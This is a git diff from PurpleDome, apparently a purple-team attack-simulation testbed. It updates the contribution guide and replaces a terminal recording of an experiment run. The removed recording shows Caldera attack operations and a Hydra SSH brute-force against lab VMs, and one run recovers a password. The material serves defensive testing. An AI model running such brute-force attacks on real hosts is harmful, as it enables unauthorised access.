diff --git a/CONTRIBUTING.txt b/CONTRIBUTING.txt index f2d8d53..6c7d48d 100644 --- a/CONTRIBUTING.txt +++ b/CONTRIBUTING.txt @@ -1,11 +1,18 @@ -We are looking forward to your contribution. To do so: +We are looking forward to your contribution. +You can find the project at https://github.com/avast/PurpleDome + +To simplify the process and enable others to contribute, we are using automated features from Github. For them to work properly, follow these steps: + +* Create an issue in our project to discuss your idea. This prevents duplicate implementations +* Fork this project * Develop in an own branch for each feature * Test it using 'make test' which executes tox -* If there are no bugs, create a PR to the master branch +* After that you can push your branch to your fork +* Create a pull request in the web ui. Please add as much information as possible + +Now automated scripts will verify the code and notify us. -If you have bigger changes please also execute experiment_control.py and verify the basic experiment still works. +Maybe we will give you some feedback. But the scripts should already have handled most of the issues. -Server side tests: -At the moment we do not test on the server. For the proper tests we would need an isolated test environment (AWS, Azure, ...). As it will have to run attacks. We are not there yet. -=> Please test your changes +If you have bigger changes please also execute experiment_control.py and verify the basic experiment still works before pushing. diff --git a/doc/source/asciinema/experiment_control.cast b/doc/source/asciinema/experiment_control.cast index f61b314..c507fbc 100644 --- a/doc/source/asciinema/experiment_control.cast +++ b/doc/source/asciinema/experiment_control.cast @@ -1,167 +1,351 @@ -{"version": 2, "width": 203, "height": 24, "timestamp": 1612795107, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}} -[0.02345, "o", "\u001b]0;thorsten@big: /home/PurpleDome\u0007\u001b[01;32mthorsten@big\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] -[5.660723, "o", "python3 experiment_control.py run"] -[7.06582, "o", "\r\n"] -[44.774933, "o", "\u001b[94mInstalling Caldera server \u001b[0m\r\n"] -[46.671437, "o", "Connecting to vagrant@127.0.0.1:2222\r\n"] -[46.674896, "o", "\r\n\u001b[92mCaldera server installed \u001b[0m\r\n"] -[46.74413, "o", "fatal: destination path 'caldera' already exists and is not an empty directory.\r\n"] -[47.578068, "o", "Defaulting to user installation because normal site-packages is not writeable\r\n"] -[47.684336, "o", "Requirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\n"] -[47.684553, "o", "Requirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\n"] -[47.685026, "o", "Requirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\n"] -[47.685451, "o", "Requirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\n"] -[47.685891, "o", "Requirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\n"] -[47.686378, "o", "Requirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\n"] -[47.686752, "o", "Requirement already satisfied: cryptography==2.8 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\n"] -[47.687137, "o", "Requirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\n"] -[47.687526, "o", "Requirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\n"] -[47.688051, "o", "Requirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\n"] -[47.688487, "o", "Requirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\n"] -[47.688879, "o", "Requirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\n"] -[47.68924, "o", "Requirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\n"] -[47.689738, "o", "Requirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\n"] -[47.690142, "o", "Requirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\n"] -[47.690584, "o", "Requirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\n"] -[47.690978, "o", "Requirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\n"] -[47.691419, "o", "Requirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\n"] -[47.691924, "o", "Requirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\n"] -[47.692325, "o", "Requirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\n"] -[47.722896, "o", "Requirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\n"] -[47.723041, "o", "Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\n"] -[47.725655, "o", "Requirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\n"] -[47.734457, "o", "Requirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (0.57.0)\r\n"] -[47.734806, "o", "Requirement already satisfied: requests!=2.18.0,>=2.14.2 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (2.24.0)\r\n"] -[47.738412, "o", "Requirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-packages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\n"] -[47.740542, "o", "Requirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\n"] -[47.757208, "o", "Requirement already satisfied: docutils>=0.11 in /usr/lib/python3/dist-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.16)\r\n"] -[47.757506, "o", "Requirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\n"] -[47.759656, "o", "Requirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\n"] -[47.774274, "o", "Requirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\n"] -[47.774601, "o", "Requirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\n"] -[47.775084, "o", "Requirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"] -[47.77542, "o", "Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\n"] -[47.775722, "o", "Requirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] -[47.77616, "o", "Requirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\n"] -[47.776757, "o", "Requirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] -[47.777259, "o", "Requirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.4)\r\n"] -[47.777573, "o", "Requirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\n"] -[47.777865, "o", "Requirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\n"] -[47.778304, "o", "Requirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\n"] -[47.778749, "o", "Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\n"] -[47.779242, "o", "Requirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"] -[47.785233, "o", "Requirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\n"] -[47.785653, "o", "Requirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\n"] -[47.804144, "o", "Requirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n"] -[48.236742, "o", "WARNING: You are using pip version 20.3.3; however, version 21.0.1 is available.\r\nYou should consider upgrading via the '/usr/bin/python3 -m pip install --upgrade pip' command.\r\n"] -[48.287567, "o", "\u001b[94mStarting Caldera server \u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"] -[48.28936, "o", "\r\n"] -[58.373838, "o", "0 Trying to connect to http://192.168.178.83:8888 Caldera API\r\n"] -[58.450802, "o", "Caldera: All systems nominal\r\n\u001b[92mCaldera server started \u001b[0m\r\n\u001b[94mpreparing target target1 ....\u001b[0m\r\n"] -[58.450913, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] -[108.496761, "o", "\u001b[92mMachine created: target1\u001b[0m\r\n"] -[108.49695, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] -[110.577613, "o", "\u001b[92mTarget running: target1 \u001b[0m\r\n\u001b[94mpreparing target target2 ....\u001b[0m\r\n"] -[113.61404, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] -[113.647142, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] -[241.860699, "o", "\u001b[92mTarget running: target2 \u001b[0m\r\n\u001b[94mContacting caldera agents on all targets ....\u001b[0m\r\n"] -[241.864951, "o", "List agents: ['target2w']\r\nConnecting to caldera http://192.168.178.83:8888, running agents are: ['target2w']\r\nMissing agent: target1 ...\r\n"] -[241.864985, "o", "\r\nnohup /vagrant/target1/caldera_agent.sh start &\r\n \r\n\u001b[94mStarting Caldera client \u001b[0m\r\n"] -[243.37839, "o", "Connecting to vagrant@127.0.0.1:2200\r\n"] -[243.380729, "o", "\r\n"] -[243.970575, "o", "\u001b[92mCaldera client started \u001b[0m\r\n"] -[248.98351, "o", "List agents: ['target2w', 'target1']\r\n\u001b[92mCaldera agents reached\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\nAttacking machine with PAW: target1\r\n"] -[249.07589, "o", "\u001b[92mExecuted attack operation\u001b[0m\r\n"] -[249.078827, "o", ".\r\n"] -[250.084198, "o", ".\r\n"] -[251.089392, "o", ".\r\n"] -[252.095383, "o", ".\r\n"] -[253.100916, "o", ".\r\n"] -[254.107019, "o", ".\r\n"] -[255.113229, "o", ".\r\n"] -[256.119078, "o", ".\r\n"] -[257.124811, "o", ".\r\n"] -[258.130561, "o", ".\r\n"] -[259.136545, "o", ".\r\n"] -[260.142284, "o", ".\r\n"] -[261.147564, "o", ".\r\n"] -[262.153097, "o", ".\r\n"] -[263.159054, "o", ".\r\n"] -[264.164656, "o", ".\r\n"] -[265.170309, "o", ".\r\n"] -[266.175776, "o", ".\r\n"] -[267.181497, "o", ".\r\n"] -[268.187033, "o", ".\r\n"] -[269.192857, "o", ".\r\n"] -[270.198772, "o", ".\r\n"] -[271.20458, "o", ".\r\n"] -[272.210351, "o", ".\r\n"] -[273.215974, "o", ".\r\n"] -[274.221582, "o", ".\r\n"] -[275.227259, "o", ".\r\n"] -[276.232114, "o", ".\r\n"] -[277.238006, "o", ".\r\n"] -[278.244737, "o", ".\r\n"] -[279.250372, "o", ".\r\n"] -[280.255877, "o", ".\r\n"] -[281.261142, "o", ".\r\n"] -[282.266827, "o", ".\r\n"] -[283.276212, "o", ".\r\n"] -[284.281898, "o", ".\r\n"] -[285.292303, "o", "Output: vagrant\r\n"] -[285.302496, "o", "\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\n"] -[285.331901, "o", "\u001b[94mRunning Kali plugin hydra\u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"] -[285.334009, "o", "\r\n"] -[285.540974, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-08 09:43:11\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"] -[285.54132, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 35 login tries (l:5/p:7), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.78:22/\r\n"] -[287.670203, "o", "[22][ssh] host: 192.168.178.78 login: password password: passw0rd\r\n"] -[289.605076, "o", "1 of 1 target successfully completed, 1 valid password found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\n"] -[289.605222, "o", "[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n"] -[289.605332, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-08 09:43:15\r\n"] -[289.633459, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\nAttacking machine with PAW: target2w\r\n"] -[289.735264, "o", "\u001b[92mExecuted attack operation\u001b[0m\r\n"] -[289.737673, "o", ".\r\n"] -[290.743309, "o", ".\r\n"] -[291.749143, "o", ".\r\n"] -[292.75563, "o", ".\r\n"] -[293.761762, "o", ".\r\n"] -[294.767529, "o", ".\r\n"] -[295.773933, "o", ".\r\n"] -[296.779098, "o", ".\r\n"] -[297.785246, "o", ".\r\n"] -[298.79125, "o", ".\r\n"] -[299.796894, "o", ".\r\n"] -[300.803806, "o", ".\r\n"] -[301.809912, "o", ".\r\n"] -[302.81538, "o", ".\r\n"] -[303.821704, "o", ".\r\n"] -[304.827187, "o", ".\r\n"] -[305.832174, "o", ".\r\n"] -[306.837548, "o", ".\r\n"] -[307.843364, "o", ".\r\n"] -[308.849045, "o", ".\r\n"] -[309.854627, "o", ".\r\n"] -[310.859799, "o", ".\r\n"] -[311.865091, "o", ".\r\n"] -[312.871194, "o", ".\r\n"] -[313.877016, "o", ".\r\n"] -[314.883502, "o", ".\r\n"] -[315.889784, "o", ".\r\n"] -[316.895866, "o", ".\r\n"] -[317.900879, "o", ".\r\n"] -[318.905719, "o", ".\r\n"] -[319.915607, "o", "Output: target2w\\purpledome\r\r\n"] -[319.925076, "o", "\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\n"] -[319.943831, "o", "\u001b[94mRunning Kali plugin hydra\u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"] -[319.945699, "o", "\r\n"] -[320.026581, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-08 09:43:46\r\n"] -[320.026727, "o", "[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"] -[320.026917, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 35 login tries (l:5/p:7), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.189:22/\r\n"] -[323.093246, "o", "1 of 1 target completed, 0 valid password found\r\n"] -[323.093366, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-08 09:43:49\r\n"] -[323.107755, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n\u001b[94mStopping machine: target1 \u001b[0m\r\n"] -[387.451531, "o", "\u001b[92mMachine stopped: target1\u001b[0m\r\n\u001b[94mStopping machine: target2 \u001b[0m\r\n"] -[390.6315, "o", "\u001b[92mMachine stopped: target2\u001b[0m\r\n\u001b[94mStopping machine: attacker \u001b[0m\r\n"] -[395.805543, "o", "\u001b[92mMachine stopped: attacker\u001b[0m\r\n"] -[395.826481, "o", "\u001b]0;thorsten@big: /home/PurpleDome\u0007\u001b[01;32mthorsten@big\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] -[398.414983, "o", "exit\r\n"] +{"version": 2, "width": 148, "height": 47, "timestamp": 1623220625, "idle_time_limit": 0.5, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}} +[0.016732, "o", "\u001b]0;thorsten@avast: /home/PurpleDome\u0007\u001b[01;32mthorsten@avast\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] +[1.249977, "o", "python3 ./experiment_control.py -v run"] +[1.8469, "o", "\r\n"] +[1.989824, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"] +[1.98994, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"] +[44.497129, "o", "\u001b[94mInstalling Caldera server \u001b[0m\r\n\u001b[92mCaldera server installed \u001b[0m\r\n"] +[46.148337, "o", "zsh:cd:1: no such file or directory: None\r\n"] +[46.152243, "o", "fatal: destination path 'caldera' already exists and is not an empty directory.\r\n"] +[46.60299, "o", "Defaulting to user installation because normal site-packages is not writeable\r\n"] +[46.65791, "o", "Requirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\n"] +[46.658396, "o", "Requirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\n"] +[46.658948, "o", "Requirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\n"] +[46.659644, "o", "Requirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\n"] +[46.660103, "o", "Requirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\n"] +[46.660601, "o", "Requirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\n"] +[46.661215, "o", "Requirement already satisfied: cryptography==2.8 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\n"] +[46.661805, "o", "Requirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\n"] +[46.662547, "o", "Requirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\n"] +[46.66313, "o", "Requirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\n"] +[46.663676, "o", "Requirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\n"] +[46.664321, "o", "Requirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\n"] +[46.664861, "o", "Requirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\n"] +[46.665769, "o", "Requirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\n"] +[46.666323, "o", "Requirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\n"] +[46.675298, "o", "Requirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\n"] +[46.675664, "o", "Requirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\n"] +[46.676383, "o", "Requirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\n"] +[46.676888, "o", "Requirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\n"] +[46.677518, "o", "Requirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\n"] +[46.694408, "o", "Requirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-packages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\n"] +[46.705625, "o", "Requirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\n"] +[46.706241, "o", "Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\n"] +[46.719201, "o", "Requirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\n"] +[46.719573, "o", "Requirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\n"] +[46.720224, "o", "Requirement already satisfied: requests>=2.5.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.24.0)\r\n"] +[46.720647, "o", "Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\n"] +[46.721477, "o", "Requirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\n"] +[46.722037, "o", "Requirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\n"] +[46.722637, "o", "Requirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"] +[46.723175, "o", "Requirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.1.0)\r\n"] +[46.723793, "o", "Requirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\n"] +[46.72433, "o", "Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\n"] +[46.724817, "o", "Requirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] +[46.725408, "o", "Requirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\n"] +[46.725894, "o", "Requirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] +[46.726375, "o", "Requirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.5)\r\n"] +[46.727076, "o", "Requirement already satisfied: docutils>=0.12 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.16)\r\n"] +[46.731192, "o", "Requirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\n"] +[46.744698, "o", "Requirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\n"] +[46.753132, "o", "Requirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (0.57.0)\r\n"] +[46.75779, "o", "Requirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\n"] +[46.75982, "o", "Requirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\n"] +[46.763264, "o", "Requirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\n"] +[46.763892, "o", "Requirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\n"] +[46.779935, "o", "Requirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n"] +[47.114079, "o", "Command exited with status 0.\r\n=== stdout ===\r\nDefaulting to user installation because normal site-packages is not writeable\r\nRequirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\nRequirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\nRequirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\nRequirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\nRequirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\nRequirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\nRequirement already satisfied: cryptography==2.8 in /h"] +[47.114214, "o", "ome/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\nRequirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\nRequirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\nRequirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\nRequirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\nRequirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\nRequirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\nRequirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/p"] +[47.114265, "o", "ython3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\nRequirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\nRequirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\nRequirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\nRequirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) 